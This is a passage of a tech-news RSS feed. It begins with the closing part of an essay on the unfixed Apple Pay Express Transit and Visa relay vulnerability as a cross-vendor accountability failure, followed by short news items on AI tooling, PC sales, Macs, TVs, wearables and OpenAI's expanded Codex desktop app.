Both acknowledged the severity. Neither has implemented a fix.</p><blockquote><em>“Our discussions with Apple and Visa revealed that when two industry parties each have partial blame, neither are willing to accept responsibility and implement a fix, leaving users vulnerable indefinitely.” — Dr. Andreea Radu, University of Birmingham</em></blockquote><h4><strong>What Most People Get Wrong</strong></h4><p>When this story circulates, the conversation almost always goes to the wrong place.</p><ul><li>First wrong assumption: <strong>this is an Apple problem.</strong> It isn’t — not entirely. The same attack doesn’t work with Mastercard on Apple Pay. It doesn’t work with Visa on Samsung Pay. The vulnerability lives at the intersection of Apple’s Express Transit implementation and Visa’s EMV transaction authorization logic. Neither party created it alone, and neither can fix it alone.</li><li>Second wrong assumption: <strong>if it hasn’t happened in the wild, it’s not a real threat.</strong> This logic consistently underestimates how quickly academic proof-of-concept research gets operationalized once it’s public. The attack is now on YouTube, demonstrated at scale, with off-the-shelf hardware. The question isn’t whether someone will try it. The question is whether it has already been tried and simply not attributed.</li><li>Third wrong assumption — and this is the one that concerns me most: <strong>the fix is technical.</strong> A patch, a protocol update, a firmware change. But the research team has been waiting years for that patch. The reason it hasn’t arrived isn’t engineering capacity. It’s accountability.</li></ul><h4><strong>The Real Problem: Nobody Owns the Boundary</strong></h4><p>In more than a decade of cybersecurity work, I’ve observed a consistent pattern: single-vendor vulnerabilities get fixed in weeks. Cross-vendor vulnerabilities sit for quarters — sometimes indefinitely.</p><p>It’s not because organizations don’t care. It’s because accountability frameworks — contracts, SLAs, security review processes — are almost never designed with the boundary in mind.</p><p>I’ve sat in multiple vendor contract and SLA negotiations throughout my career. Security controls, data handling, and incident response timelines — all covered. <strong>Cross-boundary vulnerability ownership has never once appeared in the contract.</strong> Not once. The assumption is always that if a problem crosses systems, the two parties will figure it out. What actually happens is what you’re watching play out between Apple and Visa right now.</p><p>Each party points at the other. Apple says Visa’s authorization logic is at fault. Visa notes that the same problem doesn’t exist with Visa on Samsung Pay, implying the issue is with Apple’s implementation. Both statements can be simultaneously true. Neither resolves the vulnerability.</p><p>This is what a governance failure looks like from the inside. Not malice. Not incompetence. Just two organizations, each managing their own perimeter, with nobody chartered to manage the space between them.</p><blockquote><strong>Single-vendor vulnerabilities get fixed in weeks. Cross-vendor vulnerabilities sit for quarters — or indefinitely. The difference isn’t engineering. It’s accountability.</strong></blockquote><h4><strong>The Security-Usability Tradeoff Has a Price Tag</strong></h4><p>Express Transit Mode exists for a good reason. Fumbling with Face ID at a busy subway barrier creates queues. It creates friction. The feature removes that friction deliberately, and for most users in most moments, the tradeoff is invisible.</p><p>But every time we remove friction for the user, we create a new surface for the attacker. This isn’t a new observation — it’s one of the oldest tensions in security design. What’s new is that we increasingly build these tradeoffs into products jointly, across organizational boundaries, where no single party is accountable for the consequences.</p><p>The researchers behind this work proposed a technical solution: an EMV relay-resistant protocol that would preserve the usability of Express Transit while closing the attack vector. It exists. It has been documented. It has not been implemented.</p><p>The barrier isn’t technical. It’s that implementing it requires both Apple and Visa to agree, coordinate, and share the cost of a fix for a vulnerability that neither fully owns. In the absence of regulatory pressure or a high-profile incident, that conversation has no forcing function.</p><figure><img alt="Commuters passing through New York City subway turnstiles equipped with contactless payment readers — the exact technology at the centre of the Apple Pay and Visa vulnerability." src="https://cdn-images-1.medium.com/max/1024/0*PWuwJ2Gnq5gyaWu-"><figcaption>Photo by <a href="https://unsplash.com/@asaelamaury?utm_source=medium&amp;utm_medium=referral">Asael Peña</a> on <a href="https://unsplash.com/?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><h4><strong>What You Can Do Right Now</strong></h4><p>Before you think I’m an Android evangelist — I’m not. I use an iPhone. Which is exactly why this bothers me.</p><p>While the governance conversation continues, here are four things worth acting on:</p><ul><li><strong>Check your Apple Pay setup. </strong>If you have a Visa card configured in Express Transit Mode, disable it. You can still use Apple Pay for transit — just with authentication required. That one step closes this attack vector entirely.</li><li><strong>Change your procurement question. </strong>If your organization deploys systems that integrate with third-party hardware or platforms, start asking: “If a vulnerability lives at the boundary between your system and another vendor’s, who owns the fix?” The answer will tell you everything about how seriously they’ve thought about it.</li><li><strong>Stop using brand names as security proxies. </strong>“Apple” and “Visa” together still produced a multi-year unpatched vulnerability sitting in public view. Brand reputation is a signal, not a guarantee. Evaluate the architecture, not the logo.</li><li><strong>Recognize the dollar value of the tradeoff. </strong>The security-usability tradeoff isn’t abstract. Someone always pays it. In this case, that someone could be you, standing on a platform, with a phone in your pocket and no idea that a transaction just occurred.</li></ul><h4><strong>The Conversation That Needs to Happen</strong></h4><p>In my telecom project, we eventually got both parties in the room. It was uncomfortable. It took a forced escalation. But we closed the gap in 53 days.</p><p>Apple and Visa have had years. The research team disclosed in 2020. The paper was presented at the IEEE Symposium on Security and Privacy in 2022. Veritasium put it on YouTube for millions of people to see. And the vulnerability remains open.</p><p>The technical fix exists. What’s missing is the forcing function — someone, somewhere, with enough leverage to put both parties in the same room and make one of them blink. <strong>Until that happens, the boundary between Apple’s software and Visa’s authorization logic remains ungoverned. And ungoverned boundaries, in my experience, are where attackers live.</strong></p><p>This isn’t just an Apple Pay problem. It’s a preview of every complex, multi-vendor, convenience-first system we’re building right now. The payment ecosystem, the connected car, the smart building, the industrial IoT deployment — all of them have boundaries. Almost none of those boundaries have owners.</p><p><strong>We need to start building accountability for the space between systems. Not just the systems themselves.</strong></p><p><em>If this resonated, follow me on </em><a href="https://medium.com/@kuksh091"><em>Medium</em></a><em> for more practitioner-first writing on cybersecurity, AI, and the systems thinking that connects them. Connect with me on </em><a href="https://www.linkedin.com/in/ujjwal091/"><em>LinkedIn</em></a><em>.</em></p><p><strong>Have you ever been in a vendor negotiation where cross-boundary vulnerability ownership actually appeared in the contract? I’d genuinely like to know — it would be the first time I’ve heard of it.</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=e37796a6e8e2" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/apple-knows-visa-knows-nobody-has-fixed-it-heres-why-e37796a6e8e2">Apple Knows. Visa Knows. Nobody Has Fixed It. Here’s Why.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KV Cache Is Eating Your VRAM. Here’s How Google Fixed It With TurboQuant.]]></title>
<description><![CDATA[Explore the end-to-end pipeline of TurboQuant, a novel KV cache quantization framework. This overview breaks down how multi-stage compression achieves near-lossless storage through PolarQuant and QJL residuals, enabling massive context windows with minimal memory overhead
The post KV Cache Is Eat...]]></description>
<link>https://tsecurity.de/de/3445961/ai-nachrichten/kv-cache-is-eating-your-vram-heres-how-google-fixed-it-with-turboquant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3445961/ai-nachrichten/kv-cache-is-eating-your-vram-heres-how-google-fixed-it-with-turboquant/</guid>
<pubDate>Sun, 19 Apr 2026 13:18:00 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Explore the end-to-end pipeline of TurboQuant, a novel KV cache quantization framework. This overview breaks down how multi-stage compression achieves near-lossless storage through PolarQuant and QJL residuals, enabling massive context windows with minimal memory overhead</p>
<p>The post <a href="https://towardsdatascience.com/kv-cache-is-eating-your-vram-heres-how-google-fixed-it-with-turboquant/">KV Cache Is Eating Your VRAM. Here’s How Google Fixed It With TurboQuant.</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your RAG System Retrieves the Right Data — But Still Produces Wrong Answers. Here’s Why (and How to Fix It).]]></title>
<description><![CDATA[Your RAG system is retrieving the right documents with perfect scores — yet it still confidently returns the wrong answer.
I built a 220 MB local experiment that proves the hidden failure mode almost nobody talks about: conflicting context in the same retrieval window. Two contradictory documents...]]></description>
<link>https://tsecurity.de/de/3444625/ai-nachrichten/your-rag-system-retrieves-the-right-data-but-still-produces-wrong-answers-heres-why-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3444625/ai-nachrichten/your-rag-system-retrieves-the-right-data-but-still-produces-wrong-answers-heres-why-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Apr 2026 17:02:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Your RAG system is retrieving the right documents with perfect scores — yet it still confidently returns the wrong answer.<br>
I built a 220 MB local experiment that proves the hidden failure mode almost nobody talks about: conflicting context in the same retrieval window. Two contradictory documents come back, the model picks one, and you get a fluent but incorrect response with zero warning.<br>
This article shows exactly why it happens, the three production scenarios where it silently breaks, and the tiny pipeline layer that fixes it — no extra model, no GPU, no API key required.<br>
The system behaved exactly as designed. The answer was still wrong.</p>
<p>The post <a href="https://towardsdatascience.com/your-rag-system-retrieves-the-right-data-but-still-produces-wrong-answers-heres-why-and-how-to-fix-it/">Your RAG System Retrieves the Right Data — But Still Produces Wrong Answers. Here’s Why (and How to Fix It).</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ignoring DPDP Compliance? Here’s the Risk to Your Organization]]></title>
<description><![CDATA[In boardroom discussions, data breaches are typically evaluated through the lens of financial impact, regulatory exposure, and operational disruption. While these factors are critical, they often overshadow a more fundamental concern: the consumer. Every piece of personal data collected by…
Read ...]]></description>
<link>https://tsecurity.de/de/3444184/it-security-nachrichten/ignoring-dpdp-compliance-heres-the-risk-to-your-organization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3444184/it-security-nachrichten/ignoring-dpdp-compliance-heres-the-risk-to-your-organization/</guid>
<pubDate>Sat, 18 Apr 2026 12:23:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In boardroom discussions, data breaches are typically evaluated through the lens of financial impact, regulatory exposure, and operational disruption. While these factors are critical, they often overshadow a more fundamental concern: the consumer. Every piece of personal data collected by…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ignoring-dpdp-compliance-heres-the-risk-to-your-organization/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ignoring-dpdp-compliance-heres-the-risk-to-your-organization/">Ignoring DPDP Compliance? Here’s the Risk to Your Organization</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A lot of you panic-bought PCs to avoid RAMaggedon 2026]]></title>
<description><![CDATA[The specter of price hikes caused by the current AI-driven demand for memory and storage appears to have convinced a fair share of people to buy a new computer. According to data analyzed by Counterpoint Research, global PC shipments grew around 3.2 percent year-over-year in Q1 2026, "driven by p...]]></description>
<link>https://tsecurity.de/de/3443172/it-nachrichten/a-lot-of-you-panic-bought-pcs-to-avoid-ramaggedon-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3443172/it-nachrichten/a-lot-of-you-panic-bought-pcs-to-avoid-ramaggedon-2026/</guid>
<pubDate>Fri, 17 Apr 2026 22:17:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The specter of <a target="_blank" class="link" href="https://www.engadget.com/ai/samsung-says-ram-costs-will-likely-lead-to-price-hikes-soon-170653524.html" data-i13n="cpos:1;pos:1">price hikes</a> caused by the current AI-driven demand for memory and storage appears to have convinced a fair share of people to buy a new computer. According to data <a target="_blank" class="link" href="https://counterpointresearch.com/en/insights/global-pc-shipments-q1-2026" data-i13n="cpos:2;pos:1">analyzed by Counterpoint Research</a>, global PC shipments grew around 3.2 percent year-over-year in Q1 2026, "driven by pre-emptive buying before memory-led price increases hit the retail level" and Microsoft forcing some customers to upgrade by <a target="_blank" class="link" href="https://www.engadget.com/computing/microsoft-has-ended-windows-10-support-but-heres-how-to-get-an-extra-year-for-free-125118044.html" data-i13n="cpos:3;pos:1">ending support for Windows 10 last year</a>. </p><p>Sales hit 63.3 million units during the first quarter, Counterpoint says, and were particularly concentrated in five high-end PC makers: Lenovo, ASUS, Apple, HP and Dell. Of the five, Lenovo commands the most PC market share at 26 percent, but sales increased for almost all of the companies, save for HP, whose year-over-year sales technically declined by 5 percent. Of particular note, Apple's PC sales grew by 11 percent, likely on the strength of the M5 updates it made to the <a target="_blank" class="link" href="https://www.engadget.com/computing/laptops/apple-brings-its-m5-pro-and-max-silicon-to-the-next-macbook-pro-generation-141553279.html" data-i13n="cpos:4;pos:1">MacBook Pro</a> and <a target="_blank" class="link" href="https://www.engadget.com/computing/laptops/the-macbook-air-m5-starts-at-1099-up-100-from-the-m4-141612909.html" data-i13n="cpos:5;pos:1">MacBook Air</a>, and the introduction of the affordable $600 <a target="_blank" class="link" href="https://www.engadget.com/computing/laptops/the-599-macbook-neo-is-apples-cheapest-mac-laptop-yet-141028666.html" data-i13n="cpos:6;pos:1">MacBook Neo</a>. Counterpoint suggests the updates could drive even further sales growth next quarter. </p><p>Even with positive sales, the PC industry as a whole is by no means out of the woods. "The aggressive expansion in AI infrastructure investment is driving up overall component costs, which will likely impact the pricing of CPUs and other key components in [PCs]," Counterpoint Senior Analyst Minsoo Kang says. "Ultimately, the sustained upward pressure on costs and the resulting hike in retail prices are expected to have a significant negative impact on the PC market’s growth in 2026."</p><p>A general sense that the worst is yet to come is consistent with what other analysts have warned about the current shortages of RAM and storage. In December 2025, IDC predicted that PC shipments <a target="_blank" class="link" href="https://www.engadget.com/computing/idc-warns-of-major-pc-market-downturn-due-to-memory-crunch-214510197.html" data-i13n="cpos:7;pos:1">could drop as much as 8.9 percent</a> in 2026 in response to the price of RAM, and later <a target="_blank" class="link" href="https://www.engadget.com/computing/ramaggedon-not-expected-to-ease-this-year-as-idc-cuts-2026-pc-market-forecast-again-200000498.html" data-i13n="cpos:8;pos:1">revised its prediction to 11.6 percent</a> this past March. Even if consumers aren't feeling the worst of these price hikes just yet, new announcements of price increases seem to arrive like clockwork every few weeks — for example, this week, Meta <a target="_blank" class="link" href="https://www.engadget.com/ar-vr/meta-quest-headset-prices-are-going-up-on-april-19-143259031.html" data-i13n="cpos:9;pos:1">raised the price of its Quest headsets</a> — which means if they aren't feeling them now, they will soon.</p>This article originally appeared on Engadget at https://www.engadget.com/computing/a-lot-of-you-panic-bought-pcs-to-avoid-ramaggedon-2026-200237204.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Four new Macs are launching later this year, here’s what’s coming]]></title>
<description><![CDATA[Apple has already launched three new Macs this year, but there are another four Macs rumored to debut throughout the remainder of the year. Here’s what’s coming.



 more…]]></description>
<link>https://tsecurity.de/de/3442506/ios-mac-os/four-new-macs-are-launching-later-this-year-heres-whats-coming/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3442506/ios-mac-os/four-new-macs-are-launching-later-this-year-heres-whats-coming/</guid>
<pubDate>Fri, 17 Apr 2026 17:15:41 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/03/mac-lineup-devices-apple-hello.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p>Apple has already launched three new Macs this year, but there are another four Macs rumored to debut throughout the remainder of the year. Here’s what’s coming.</p>



 <a data-layer-pagetype="post" data-layer-postcategory="mac" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1043871" href="https://9to5mac.com/2026/04/17/four-new-macs-are-launching-later-this-year-heres-whats-coming/#more-1043871" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s the Android 17 Easter Egg]]></title>
<description><![CDATA[The Android Easter egg has not changed much in recent years, but with the latest Android 17 Beta 4, Google has shown us a bit of a refresh. The space theme is still here, only now we get to play connect-the-stars and then blast into space. To find this Easter egg, you do as you...
Read the origin...]]></description>
<link>https://tsecurity.de/de/3442229/it-nachrichten/heres-the-android-17-easter-egg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3442229/it-nachrichten/heres-the-android-17-easter-egg/</guid>
<pubDate>Fri, 17 Apr 2026 15:47:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Android Easter egg has not changed much in recent years, but with the latest Android 17 Beta 4, Google has shown us a bit of a refresh. The space theme is still here, only now we get to play connect-the-stars and then blast into space. To find this Easter egg, you do as you...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/04/17/heres-the-android-17-easter-egg/">Here’s the Android 17 Easter Egg</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TCL's RGB-Mini LED TVs will start at $8,000]]></title>
<description><![CDATA[TCL introduced its new flagship X11L SQD-Mini LED TV at CES 2026, and now a few months later, the company is ready to expand its lineup with more SQD-Mini LED models and its first RGB-Mini LED TV. All sizes of the TCL QM8L SQD-Mini LED TV are available now. Meanwhile, both the TCL QM7L SQD-Mini L...]]></description>
<link>https://tsecurity.de/de/3442116/it-nachrichten/tcls-rgb-mini-led-tvs-will-start-at-8000/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3442116/it-nachrichten/tcls-rgb-mini-led-tvs-will-start-at-8000/</guid>
<pubDate>Fri, 17 Apr 2026 15:19:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TCL introduced its new <a target="_blank" class="link" href="https://www.engadget.com/home/home-theater/tcl-unveils-its-x11l-sqd-mini-led-tvs-at-ces-2026-205532386.html" data-i13n="cpos:1;pos:1">flagship X11L SQD-Mini LED TV</a> at CES 2026, and now a few months later, the company is ready to expand its lineup with more SQD-Mini LED models and its first RGB-Mini LED TV. All sizes of the TCL QM8L SQD-Mini LED TV are available now. Meanwhile, both the TCL QM7L SQD-Mini LED TVs and the RM9L RGB-Mini LED TVs are available to pre-order. </p><p><a target="_blank" class="no-affiliate-link link" href="https://www.tcl.com/global/en/sqd-mini-led-tv" data-i13n="elm:context_link;elmt:doNotAffiliate;cpos:2;pos:1">SQD-Mini LED</a> panels are TCL's latest iteration of its Mini LED display technology, where "SQD" stands for "Super Quantum Dot," a layer of tiny crystal dots that help filter the light from the LEDs in the company's panels. TCL claims its SQD-Mini LED screens are more color accurate than its previous models without losing out on HDR contrast. The TCL QM8L has an anti-reflective SQD-Mini LED panel, up to 4,000 discrete dimming zones, up to 6,000 nits of peak brightness and support for <a target="_blank" class="link" href="https://www.engadget.com/home/home-theater/dolby-vision-2-is-coming-this-year-heres-what-you-need-to-know-140000034.html" data-i13n="cpos:3;pos:1">Dolby Vision 2 Max</a> after a software update. The TCL QM7L also has an anti-reflective SQD-Mini LED panel, up to 2,100 discrete dimming zones, up to 3,000 nights of peak brightness and support for Dolby Vision IQ. Both TVs feature Audio by Bang &amp; Olufsen and run the latest version of <a target="_blank" class="link" href="https://www.engadget.com/home/home-theater/google-tvs-new-gemini-features-range-from-useful-to-unnecessary-222900001.html" data-i13n="cpos:4;pos:1">Google TV with support for Gemini</a>.</p><figure><img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/tcl-rm9l-tv_2544.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/tcl-rm9l-tv_2544.jpg" alt="A TCL RM9L RGB-Mini LED TV angled to the left on a white background." data-uuid="d49dfa88-ec5d-477c-a5cd-19e99929ef34"><figcaption></figcaption><div class="photo-credit">TCL</div></figure><p>Like other TV makers at CES 2026, TCL also capitalized on the growing trend of <a target="_blank" class="link" href="https://www.engadget.com/home/home-theater/what-are-micro-rgb-tvs-and-why-are-they-everywhere-at-ces-2026-182441543.html" data-i13n="cpos:5;pos:1">Micro RGB or RGB Mini LED panels</a>. Rather than use a layer of white or blue LEDs that are transformed with quantum dots and color filters, TCL's RGB-Mini LED starts with discrete red, green and blue LEDs to produce richer color. The TCL RM9L features the company's new RGB-Mini LED display with an anti-reflective layer, over 3,800 discrete local dimming zones, up to 6,000 nits of peak brightness and support for Dolby Vision 2 after a software update. The TV also features Bang &amp; Olufsen audio and Google TV with Gemini support.</p><p>TCL says the QM8L is available to order now starting at $2,500 for the 65-inch model, $3,000 for the 75-inch model, $4,000 for the 85-inch model and $6,000 for the 98-inch model. The TCL QM7L, meanwhile, is available to pre-order starting at $1,200 for the 55-inch model and goes as high as $4,000 for the 98-inch model. If you're curious about TCL's new RGB-Mini LED displays, the TCL RM9L is available to pre-order starting at $8,000 for the 85-inch model and up to an eye-popping $30,000 for a 115-inch model.</p>This article originally appeared on Engadget at https://www.engadget.com/home/home-theater/tcls-rgb-mini-led-tvs-will-start-at-8000-130000543.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI drastically updates Codex desktop app to use all other apps on your computer, generate images, preview webpages]]></title>
<description><![CDATA[Confirming it has reached 3 million weekly developers, OpenAI is massively updating its Codex developer environment via its Mac and Windows desktop apps today to bring it closer to the “Super App” the company has confirmed it is pursuing.Before today, Codex was primarily an environment for using ...]]></description>
<link>https://tsecurity.de/de/3439971/it-nachrichten/openai-drastically-updates-codex-desktop-app-to-use-all-other-apps-on-your-computer-generate-images-preview-webpages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3439971/it-nachrichten/openai-drastically-updates-codex-desktop-app-to-use-all-other-apps-on-your-computer-generate-images-preview-webpages/</guid>
<pubDate>Thu, 16 Apr 2026 21:17:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Confirming it has reached 3 million weekly developers, <a href="https://openai.com/index/codex-for-almost-everything/">OpenAI is massively updating its Codex developer environment</a> via its Mac and Windows desktop apps today to bring it closer to the “Super App” the company has confirmed it is pursuing.</p><p>Before today, Codex was primarily an environment for using OpenAI’s underlying language models to write, edit, debug and ship software as directed by the user. </p><p>Now, Codex will be able to access all of the other apps on your computer, surface relevant information from within them to you when asked or proactively, take actions as directed in said applications, and, in the case of Mac users, even do so while you continue manually using your computer simultaneously to your agents working in the background.</p><div></div><p>Andrew Ambrosino, an OpenAI technical staffer on the Codex team, described the change plainly in an embargoed press briefing I attended virtually yesterday: “Codex can actually click on apps, launch apps, and type into apps. This works with any apps on your machine.” </p><p>Codex on desktop is further getting its own built-in web browser, allowing users to preview their front-end development, and a directly integrated pipeline to OpenAI’s powerful AI image generation model gpt-image-1.5, allowing users to generate imagery for their projects — everything from websites to presentations to full playable PC games with hundreds of assets — all in the same style.</p><p>As Thibault "Tibo" Sottiaux, Head of Codex at OpenAI, said during the briefing: “It’s not just about the growth. It is putting a very capable agent in the hands of builders, and now we’re seeing that we’re able to expand and do a lot more work entirely across your computer"</p><p>Asked why OpenAI was pursuing all this in Codex, not its more recognizable flagship app, ChatGPT, Sottiaux told VentureBeat: “Codex is our most powerful agent.It already worked on your computer, and so we’re expanding the capabilities there. It felt very natural. We will make it make sense at some point."</p><p>The update comes as rival Anthropic has previously courted similar use cases with the launch of its <a href="https://venturebeat.com/orchestration/anthropic-says-claude-code-transformed-programming-now-claude-cowork-is">Claude Cowork</a> and redesigned <a href="https://venturebeat.com/orchestration/we-tested-anthropics-redesigned-claude-code-desktop-app-and-routines-heres-what-enterprises-should-know">Claude Code desktop app views</a>, all available within the Claude desktop app for Mac and Windows. But Claude does not allow for simultaneous background app cursor usage from the desktop app across all of a user's apps like Codex does.</p><h2><b>Multiple agentic computer use workflows in the background on macOS</b></h2><p>The most significant technological leap in this release is "Computer Use," limited for now to macOS users.</p><p>This feature allows Codex to break out of the traditional chatbot container to "see, click, and type" across all applications on a machine.</p><p>Crucially, this happens in the background. "It can use apps on your computer in the background, as opposed to taking over your entire computer," explained Caffrey Lynch of OpenAI’s developer product communications. </p><p>This enables "multi-agent" workflows where Codex might be testing a frontend change or triaging a JIRA ticket while the developer continues working in a different application.</p><p>For Windows users, the core Codex desktop app remains available and supported — as does pulling information in from those apps to surface to the user in Codex  — though it lacks the cursor-level background interaction available on Mac at launch.</p><h2><b>A one-stop shop for end-to-end software development</b></h2><p>Beyond operating the OS, OpenAI is doubling down on the "Software Development Lifecycle" (SDLC). The Codex app now functions more like a unified workspace, supporting everything from GitHub PR reviews to managing remote infrastructure.</p><p>"The simplest way to think about this release is teaching Codex and the app to work across a much larger surface area," said Andrew Ambrosino, lead of Codex app development. This surface area now includes:</p><ul><li><p><b>Integrated Browser</b>: An in-app browser allows developers to iterate on frontend designs by commenting directly on DOM elements, providing precise instructions for the agent to follow.</p></li><li><p><b>Visual Primitives</b>: By integrating gpt-image-1.5, Codex can now generate and iterate on images for mockups and game assets directly within the development workflow.</p></li><li><p><b>Expanded Sidebar</b>: The app now includes rich previews for non-code files such as PDFs, spreadsheets, and slide decks, alongside a summary pane to track agent plans and sources.</p></li><li><p><b>Terminal &amp; SSH</b>: The update adds support for multiple terminal tabs and an alpha feature for connecting to remote devboxes via SSH.</p></li></ul><p>To connect these disparate tasks, OpenAI is releasing more than 90 new plugins. These connectors—including CircleCI, GitLab, and Microsoft Suite—allow the agent to gather context and take action across the entire toolchain a developer uses daily.</p><p>In a demo video shown off during the briefing, OpenAI presented an example showing the user typing into the Codex prompt entry field, “Can you check Slack, Gmail, Google Calendar, and Notion and tell me what needs my attention?” showing how Codex can now scan across multiple apps and gather information from them all in single prompt, and surface what matters most to the user.</p><p>“You can @ mention them if you want Codex to use a specific app, or if not, Codex can discover which apps to use,” Ambrosino said.</p><h2><b>The ‘heartbeat’ of productivity</b></h2><p>One of the more subtle but powerful shifts is the introduction of persistent agency. Through "Heartbeat Automations," Codex can now schedule future work for itself and "wake up" to continue long-term tasks. </p><p>This allows teams to set up agents that monitor Slack channels or Notion docs and proactively update documentation or landing PRs.</p><p>This is supported by a new "Memory" feature, currently in preview. Memory allows Codex to remember personal preferences, previous corrections, and gathered information, reducing the need for extensive custom instructions in every new session.</p><p>"As you use Codex, Codex also becomes better at being proactive," noted Sottiaux.</p><p>This proactivity manifests in a "daily brief" style feature where the app suggests how to start the day by identifying open Google Doc comments or relevant Slack context.</p><p>It's similar in spirit and practice to the new <a href="https://venturebeat.com/orchestration/we-tested-anthropics-redesigned-claude-code-desktop-app-and-routines-heres-what-enterprises-should-know">"Routines" feature launched by Anthropic for its Claude Code product</a> earlier this week.</p><h2><b>Licensing, pricing, and availability</b></h2><p>OpenAI has recently transitioned toward a more flexible pricing model for teams, including a $100 plan and pay-as-you-go options to accommodate the increased usage of autonomous agents. For individual users, these updates are rolling out today to those signed in to the Codex desktop app with ChatGPT.</p><p>While the <b>Codex desktop app is available on both macOS and Windows</b>, the rollout of specific features is tiered:</p><ul><li><p><b>Background Computer Use</b>: macOS only at launch.</p></li><li><p><b>Personalization (Memory/Suggestions)</b>: Coming soon for Enterprise, Edu, EU, and UK users.</p></li><li><p><b>Core Software Development Life Cycle Updates</b>: Available to all desktop app users starting today.</p></li></ul><h2><b>The vision: from developer tool to Super App for all</b></h2><p>When asked if these features represent the foundation of an AI "Super App," Sottiaux confirmed the strategy: "We’re building the Super App in the open and evolving it out of the Codex app".</p><p>The goal is to address the reality that developers spend a majority of their time on coordination and context-gathering rather than writing code. </p><p>By bringing Codex closer to the operating system and the broader ecosystem of developer tools, OpenAI is positioning it as the central nervous system for modern software development.</p><p>"Our mission is to ensure that AGI benefits all of humanity," the company stated in its official announcement. "That means narrowing the gap between what people can imagine and what they can actually build".</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s a Ton of New Looks at Fitbit’s Upcoming Screen-less Device]]></title>
<description><![CDATA[Ever since Google, Fitbit, and Steph Curry began teasing a new wearable without a screen that could compete with WHOOP and Amazfit, I’ve been sort of obsessed with finding out more. That first tease has led to far too many slow-motion video recap sessions of a basketball player that has spent his...]]></description>
<link>https://tsecurity.de/de/3436748/it-nachrichten/heres-a-ton-of-new-looks-at-fitbits-upcoming-screen-less-device/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436748/it-nachrichten/heres-a-ton-of-new-looks-at-fitbits-upcoming-screen-less-device/</guid>
<pubDate>Wed, 15 Apr 2026 22:02:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ever since Google, Fitbit, and Steph Curry began teasing a new wearable without a screen that could compete with WHOOP and Amazfit, I’ve been sort of obsessed with finding out more. That first tease has led to far too many slow-motion video recap sessions of a basketball player that has spent his career causing nothing...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/04/15/heres-a-ton-of-new-looks-at-fitbits-upcoming-screen-less-device/">Here’s a Ton of New Looks at Fitbit’s Upcoming Screen-less Device</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google launches Gemini AI Mac app, here’s what it offers]]></title>
<description><![CDATA[Google’s Gemini AI app is a constant top three iPhone app in the App Store. Starting today, Gemini is available as a dedicated Mac app as well. This makes macOS the first platform with a desktop Gemini AI app.  



 more…]]></description>
<link>https://tsecurity.de/de/3436337/ios-mac-os/google-launches-gemini-ai-mac-app-heres-what-it-offers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436337/ios-mac-os/google-launches-gemini-ai-mac-app-heres-what-it-offers/</guid>
<pubDate>Wed, 15 Apr 2026 19:02:46 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
